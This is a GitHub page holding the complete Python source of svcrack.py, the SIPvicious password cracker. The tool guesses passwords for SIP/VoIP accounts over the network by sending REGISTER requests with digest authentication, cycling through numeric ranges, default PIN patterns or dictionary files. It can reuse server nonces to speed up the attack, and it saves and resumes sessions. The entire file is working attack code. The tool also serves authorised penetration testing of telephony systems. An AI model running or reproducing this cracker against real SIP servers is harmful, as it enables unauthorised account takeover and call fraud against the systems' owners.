forked from EnableSecurity/sipvicious
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsvcrack.py
executable file
·522 lines (498 loc) · 23.4 KB
/
svcrack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
#!/usr/bin/env python
# SIPvicious password cracker - svcrack
__GPL__ = """
SIPvicious password cracker is an online password guessing tool for SIP devices
Copyright (C) 2012 Sandro Gauci <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from libs.svhelper import __author__, __version__
__prog__ = 'svcrack'
import socket
import select
import random
import logging
import base64
import time
class ASipOfRedWine:
def __init__(self,host='localhost',bindingip='',localport=5060,port=5060,
externalip=None,
username=None,crackmode=1,crackargs=None,realm=None,sessionpath=None,
selecttime=0.005,compact=False,reusenonce=False,extension=None,
maxlastrecvtime=10,domain=None):
from libs.svhelper import dictionaryattack, numericbrute, packetcounter
import logging
self.log = logging.getLogger('ASipOfRedWine')
self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.sock.settimeout(10)
self.sessionpath = sessionpath
self.maxlastrecvtime = maxlastrecvtime
self.lastrecvtime = time.time()
self.dbsyncs = False
if self.sessionpath is not None:
self.resultpasswd = anydbm.open(
os.path.join(self.sessionpath,'resultpasswd'),'c'
)
try:
self.resultpasswd.sync()
self.dbsyncs = True
self.log.info("Db does sync")
except AttributeError:
self.log.info("Db does not sync")
pass
else:
self.resultpasswd = dict()
self.nomore = False
self.passwordcracked = False
self.rlist = [self.sock]
self.wlist = list()
self.xlist = list()
self.challenges = list()
self.crackmode = crackmode
self.crackargs = crackargs
self.dsthost,self.dstport =host,int(port)
self.domain = self.dsthost
if domain:
self.domain = domain
if crackmode == 1:
self.passwdgen = numericbrute(*crackargs)
elif crackmode == 2:
self.passwdgen = dictionaryattack(crackargs)
self.username = username
self.realm = realm
self.selecttime = selecttime
self.dstisproxy = None
self.ignorenewnonce = True
self.noauth = False
self.auth = dict()
self.previouspassword = str()
self.compact=compact
self.reusenonce = reusenonce
self.staticnonce = None
self.staticcid = None
if extension is not None:
self.extension = extension
else:
self.extension = username
self.bindingip = bindingip
self.localport = localport
self.originallocalport = localport
if self.sessionpath is not None:
self.packetcount = packetcounter(50)
if externalip is None:
self.log.debug("external ip was not set")
if (self.bindingip != '0.0.0.0') and (len(self.bindingip) > 0):
self.log.debug("but bindingip was set! we'll set it to the binding ip")
self.externalip = self.bindingip
else:
try:
self.log.info("trying to get self ip .. might take a while")
self.externalip = socket.gethostbyname(socket.gethostname())
except socket.error:
self.externalip = '127.0.0.1'
else:
self.log.debug("external ip was set")
self.externalip = externalip
PROXYAUTHREQ = 'SIP/2.0 407 '
AUTHREQ = 'SIP/2.0 401 '
OKEY = 'SIP/2.0 200 '
NOTFOUND = 'SIP/2.0 404 '
INVALIDPASS = 'SIP/2.0 403 '
TRYING = 'SIP/2.0 100 '
def Register(self,extension,remotehost,auth=None,cid=None):
from libs.svhelper import makeRequest
from libs.svhelper import createTag
m = 'REGISTER'
if cid is None:
cid='%s' % str(random.getrandbits(32))
branchunique = '%s' % random.getrandbits(32)
cseq = 1
localtag=str(random.getrandbits(32))
contact = 'sip:%s@%s' % (extension,remotehost)
if auth is not None:
cseq = 2
localtag=createTag('%s:%s' % (self.auth['username'],self.auth['password']))
register = makeRequest(
m,
'"%s" <sip:%s@%s>' % (extension,extension,self.domain),
'"%s" <sip:%s@%s>' % (extension,extension,self.domain),
self.domain,
self.dstport,
callid=cid,
srchost=self.externalip,
branchunique=branchunique,
cseq=cseq,
auth=auth,
localtag=localtag,
compact=self.compact,
localport=self.localport
)
return register
def getResponse(self):
from libs.svhelper import getNonce,getCredentials,getRealm,getCID
# we got stuff to read off the socket
buff,srcaddr = self.sock.recvfrom(8192)
if buff.startswith(self.PROXYAUTHREQ):
self.dstisproxy = True
elif buff.startswith(self.AUTHREQ):
self.dstisproxy = False
if buff.startswith(self.PROXYAUTHREQ) or buff.startswith(self.AUTHREQ):
nonce = getNonce(buff)
cid = getCID(buff)
if self.realm is None:
self.realm = getRealm(buff)
if None not in (nonce,self.realm):
if self.reusenonce:
if len(self.challenges) > 0:
return
else:
self.staticnonce = nonce
self.staticcid = cid
self.challenges.append([nonce,cid])
elif buff.startswith(self.OKEY):
self.passwordcracked = True
_tmp = getCredentials(buff)
if (_tmp is not None) and (len(_tmp) == 2):
crackeduser,crackedpasswd = _tmp
self.log.info("The password for %s is %s" % (crackeduser,crackedpasswd))
self.resultpasswd[crackeduser] = crackedpasswd
if self.sessionpath is not None and self.dbsyncs:
self.resultpasswd.sync()
else:
self.log.info("Does not seem to require authentication")
self.noauth = True
self.resultpasswd[self.username] = '[no password]'
elif buff.startswith(self.NOTFOUND):
self.log.warn("User not found")
self.noauth = True
elif buff.startswith(self.INVALIDPASS):
pass
elif buff.startswith(self.TRYING):
pass
else:
self.log.error("We got an unknown response")
self.log.debug(`buff`)
self.nomore = True
def start(self):
#from libs.svhelper import ,getCredentials,getRealm,getCID
import socket, pickle
from libs.svhelper import mysendto
if self.bindingip == '':
bindingip = 'any'
else:
bindingip = self.bindingip
self.log.debug("binding to %s:%s" % (bindingip,self.localport))
while 1:
if self.localport > 65535:
self.log.critical("Could not bind to any port")
return
try:
self.sock.bind((self.bindingip,self.localport))
break
except socket.error:
self.log.debug("could not bind to %s" % self.localport)
self.localport += 1
if self.originallocalport != self.localport:
self.log.warn("could not bind to %s:%s - some process might already be listening on this port. Listening on port %s instead" % (self.bindingip,self.originallocalport, self.localport))
self.log.info("Make use of the -P option to specify a port to bind to yourself")
# perform a test 1st ..
data = self.Register(self.extension,self.domain)
try:
mysendto(self.sock,data,(self.dsthost,self.dstport))
except socket.error,err:
self.log.error("socket error: %s" % err)
return
try:
self.getResponse()
self.lastrecvtime = time.time()
except socket.timeout:
self.log.error("no server response")
return
except socket.error,err:
self.log.error("socket error:%s" % err)
return
if self.noauth is True:
return
while 1:
r, w, e = select.select(
self.rlist,
self.wlist,
self.xlist,
self.selecttime
)
if r:
if self.passwordcracked:
break
# we got stuff to read off the socket
try:
self.getResponse()
self.lastrecvtime = time.time()
except socket.error,err:
self.log.warn("socket error: %s" % err)
else:
# check if its been a while since we had a response to prevent
# flooding - otherwise stop
timediff = time.time() - self.lastrecvtime
if timediff > self.maxlastrecvtime:
self.nomore = True
self.log.warn('It has been %s seconds since we last received a response - stopping' % timediff)
if self.passwordcracked:
break
if self.nomore is True:
try:
while not self.passwordcracked:
self.getResponse()
except socket.timeout:
break
# no stuff to read .. its our turn to send back something
if len(self.challenges) > 0:
# we have challenges to take care of
self.auth = dict()
self.auth['username'] = self.username
self.auth['realm'] = self.realm
if self.reusenonce:
self.auth['nonce'] = self.staticnonce
cid = self.staticcid
else:
self.auth['nonce'],cid = self.challenges.pop()
self.auth['proxy'] = self.dstisproxy
try:
self.auth['password'] = self.passwdgen.next()
self.previouspassword = self.auth['password']
self.log.debug('trying %s' % self.auth['password'])
except StopIteration:
self.log.info("no more passwords")
self.nomore = True
continue
else:
self.auth = None
cid = None
data = self.Register(self.extension,self.domain,self.auth,cid)
try:
mysendto(self.sock,data,(self.dsthost,self.dstport))
#self.sock.sendto(data,(self.dsthost,self.dstport))
if self.sessionpath is not None:
if self.packetcount.next():
try:
if self.crackmode == 1:
pickle.dump(self.previouspassword,open(os.path.join(exportpath,'lastpasswd.pkl'),'w'))
self.log.debug('logged last extension %s' % self.previouspassword)
elif self.crackmode == 2:
pickle.dump(self.crackargs.tell(),open(os.path.join(exportpath,'lastpasswd.pkl'),'w'))
self.log.debug('logged last position %s' % self.crackargs.tell())
except IOError:
self.log.warn('could not log the last extension scanned')
except socket.error,err:
self.log.error("socket error: %s" % err)
break
if __name__ == '__main__':
from optparse import OptionParser
from datetime import datetime
from libs.svhelper import getRange, resumeFrom,calcloglevel
import anydbm
import os
from sys import exit
import logging
import pickle
from libs.svhelper import standardoptions, standardscanneroptions
usage = "usage: %prog -u username [options] target\r\n"
usage += "examples:\r\n"
usage += "%prog -u100 -d dictionary.txt 10.0.0.1\r\n"
usage += "%prog -u100 -r1-9999 -z4 10.0.0.1\r\n"
parser = OptionParser(usage,version="%prog v"+str(__version__)+__GPL__)
parser = standardoptions(parser)
parser = standardscanneroptions(parser)
parser.add_option("-u", "--username", dest="username",
help="username to try crack", metavar="USERNAME")
parser.add_option("-d", "--dictionary", dest="dictionary", type="string",
help="specify a dictionary file with passwords",
metavar="DICTIONARY")
parser.add_option("-r", "--range", dest="range", default="100-999",
help="specify a range of numbers. example: 100-200,300-310,400",
metavar="RANGE")
parser.add_option("-e", "--extension", dest="extension",
help="Extension to crack. Only specify this when the extension is different from the username.",
metavar="EXTENSION")
parser.add_option("-z", "--zeropadding", dest="zeropadding", type="int", default=0,
help="""the number of zeros used to padd the password.
the options "-r 1-9999 -z 4" would give 0001 0002 0003 ... 9999""",
metavar="PADDING")
parser.add_option("-n", "--reusenonce", dest="reusenonce", default=False,
help="Reuse nonce. Some SIP devices don't mind you reusing the nonce (making them vulnerable to replay attacks). Speeds up the cracking.",
action="store_true",
)
parser.add_option('--template', '-T', action="store", dest="template",
help="""A format string which allows us to specify a template for the extensions
example svwar.py -e 1-999 --template="123%#04i999" would scan between 1230001999 to 1230999999"
""")
parser.add_option('--maximumtime', action='store', dest='maximumtime', type="int",
default=10,
help="""Maximum time in seconds to keep sending requests without
receiving a response back""")
parser.add_option('--enabledefaults', '-D', action="store_true", dest="defaults",
default=False, help="""Scan for default / typical passwords such as
1000,2000,3000 ... 1100, etc. This option is off by default.
Use --enabledefaults to enable this functionality""")
parser.add_option('--domain', dest="domain",
help="force a specific domain name for the SIP message, eg. -d example.org")
(options, args) = parser.parse_args()
exportpath = None
logging.basicConfig(level=calcloglevel(options))
logging.debug('started logging')
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser('~'),'.sipvicious',__prog__,options.resume)
if os.path.exists(os.path.join(exportpath,'closed')):
logging.error("Cannot resume a session that is complete")
exit(1)
if not os.path.exists(exportpath):
logging.critical('A session with the name %s was not found'% options.resume)
exit(1)
optionssrc = os.path.join(exportpath,'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options,args = pickle.load(open(optionssrc,'r'))
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser('~'),'.sipvicious',__prog__,options.save)
logging.debug('Session path: %s' % exportpath)
if options.resume is not None:
exportpath = os.path.join(os.path.expanduser('~'),'.sipvicious',__prog__,options.resume)
if not os.path.exists(exportpath):
logging.critical('A session with the name %s was not found'% options.resume)
exit(1)
optionssrc = os.path.join(exportpath,'options.pkl')
previousresume = options.resume
previousverbose = options.verbose
options,args = pickle.load(open(optionssrc,'r'))
options.resume = previousresume
options.verbose = previousverbose
elif options.save is not None:
exportpath = os.path.join(os.path.expanduser('~'),'.sipvicious',__prog__,options.save)
if len(args) != 1:
parser.error("provide one hostname")
else:
host=args[0]
if options.username is None:
parser.error("provide one username to crack")
if options.dictionary is not None:
crackmode=2
try:
dictionary = open(options.dictionary,'r')
except IOError:
logging.error("could not open %s" % options.dictionary)
if options.resume is not None:
lastpasswdsrc = os.path.join(exportpath,'lastpasswd.pkl')
previousposition = pickle.load(open(lastpasswdsrc,'r'))
dictionary.seek(previousposition)
crackargs = dictionary
else:
crackmode = 1
if options.resume is not None:
lastpasswdsrc = os.path.join(exportpath,'lastpasswd.pkl')
try:
previouspasswd = pickle.load(open(lastpasswdsrc,'r'))
except IOError:
logging.critical('Could not read from %s' % lastpasswdsrc)
exit(1)
logging.debug('Previous range: %s' % options.range)
options.range = resumeFrom(previouspasswd,options.range)
logging.debug('New range: %s' % options.range)
logging.info('Resuming from %s' % previouspasswd)
rangelist = getRange(options.range)
crackargs = (rangelist,options.zeropadding,options.template,options.defaults,[options.username])
if options.save is not None:
if options.resume is None:
exportpath = os.path.join(os.path.expanduser('~'),'.sipvicious',__prog__,options.save)
if os.path.exists(exportpath):
logging.warn('we found a previous scan with the same name. Please choose a new session name')
exit(1)
logging.debug('creating an export location %s' % exportpath)
try:
os.makedirs(exportpath,mode=0700)
except OSError:
logging.critical('could not create the export location %s' % exportpath)
exit(1)
optionsdst = os.path.join(exportpath,'options.pkl')
logging.debug('saving options to %s' % optionsdst)
pickle.dump([options,args],open(optionsdst,'w'))
if options.autogetip:
tmpsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmpsocket.connect(("msn.com",80))
options.externalip=tmpsocket.getsockname()[0]
tmpsocket.close()
sipvicious = ASipOfRedWine(
host,
username=options.username,
selecttime=options.selecttime,
compact=options.enablecompact,
crackmode=crackmode,
crackargs=crackargs,
reusenonce=options.reusenonce,
extension=options.extension,
sessionpath=exportpath,
port=options.port,
externalip=options.externalip,
maxlastrecvtime=options.maximumtime,
localport=options.localport,
domain=options.domain
)
start_time = datetime.now()
logging.info("scan started at %s" % str(start_time))
try:
sipvicious.start()
if exportpath is not None:
open(os.path.join(exportpath,'closed'),'w').close()
except KeyboardInterrupt:
logging.warn('caught your control^c - quiting')
except Exception, err:
import traceback
from libs.svhelper import reportBugToAuthor
if options.reportBack:
logging.critical( "Got unhandled exception : sending report to author" )
reportBugToAuthor(traceback.format_exc())
else:
logging.critical( "Unhandled exception - please run same command with the -R option to send me an automated report")
pass
logging.exception( "Exception" )
if options.save is not None and sipvicious.previouspassword is not None:
lastextensiondst = os.path.join(exportpath,'lastpasswd.pkl')
logging.debug('saving state to %s' % lastextensiondst)
try:
if crackmode == 1:
pickle.dump(sipvicious.previouspassword,open(os.path.join(exportpath,'lastpasswd.pkl'),'w'))
logging.debug('logged last password %s' % sipvicious.previouspassword)
elif crackmode == 2:
pickle.dump(sipvicious.crackargs.tell(),open(os.path.join(exportpath,'lastpasswd.pkl'),'w'))
logging.debug('logged last position %s' % sipvicious.crackargs.tell())
except IOError:
logging.warn('could not log the last tried password')
# display results
if not options.quiet:
lenres = len(sipvicious.resultpasswd)
if lenres > 0:
logging.info("we have %s cracked users" % lenres)
if (lenres < 400 and options.save is not None) or options.save is None:
from libs.pptable import indent,wrap_onspace
width = 60
labels = ('Extension','Password')
rows = list()
for k in sipvicious.resultpasswd.keys():
rows.append((k,sipvicious.resultpasswd[k]))
print indent([labels]+rows,hasHeader=True,
prefix='| ', postfix=' |',wrapfunc=lambda x: wrap_onspace(x,width))
else:
logging.warn("too many to print - use svreport for this")
else:
logging.warn("found nothing")
end_time = datetime.now()
total_time = end_time - start_time
logging.info("Total time: %s" % total_time)